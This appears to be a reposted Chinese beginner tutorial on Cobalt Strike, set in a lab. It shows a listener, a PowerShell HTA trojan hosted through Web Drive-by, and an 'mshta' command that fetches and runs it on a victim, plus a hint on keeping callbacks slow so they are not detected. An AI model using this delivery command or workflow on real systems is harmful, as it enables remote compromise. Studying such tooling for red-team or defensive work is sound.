Cobalt Strike第三篇简单使用

Posted 水中煮鱼冒气

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Cobalt Strike第三篇简单使用相关的知识,希望对你有一定的参考价值。

在这里插入图片描述

0x01创建监听器

点击Cobalt Strike -> Listeners->Add,其中内置了九个Listener

在这里插入图片描述
在这里插入图片描述

0x02生成木马

  • 点击Attacks->Packages->html Application,
  • 选择对应的监听器,方法这里有三种(executable/VBA/powershell)
  • 选择powershell,
  • 点击Generate生成,
  • 选择生成的路径及文件名保存即可。
    在这里插入图片描述
    在这里插入图片描述

0x03开启web服务

  • 点击Attacks->Web Drive-by->Host File,
  • 选择刚刚生成的木马evil.hta,
  • 点击Launch生成下载链接
http://192.168.52.129:8080/download/file.ext

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0x04 运行木马

  • 打开受害机cmd,
  • 运行mshta命令。
  • mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件。
mshta http://192.168.0.102:80/download/file.ext

在这里插入图片描述

0x05返回CS即可看到

在这里插入图片描述

0x06 执行命令

  • 选择interact,即可进行交互,由于受害机默认60秒进行一次回传,
  • 为了实验效果我们这里把时间设置成5,
  • 但实际中频率不宜过快,容易被发现。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

0x07导出报告

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

摘抄


我将于茫茫人海中访我唯一灵魂之伴侣,

得之我幸,不得我命。

或得则吾生,不或则吾灭。

– 徐志摩


以上是关于Cobalt Strike第三篇简单使用的主要内容,如果未能解决你的问题,请参考以下文章

Cobalt-Strike基本使用

148.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon基础使用/脚本web传递/屏幕截图/端口扫描]

Cobalt Strike 连接启动教程,制作图片🐎

cobalt strike渗透框架

kali cobalt strike metasploit的服务停止 怎么修改

Cobalt Strike第二篇使用介绍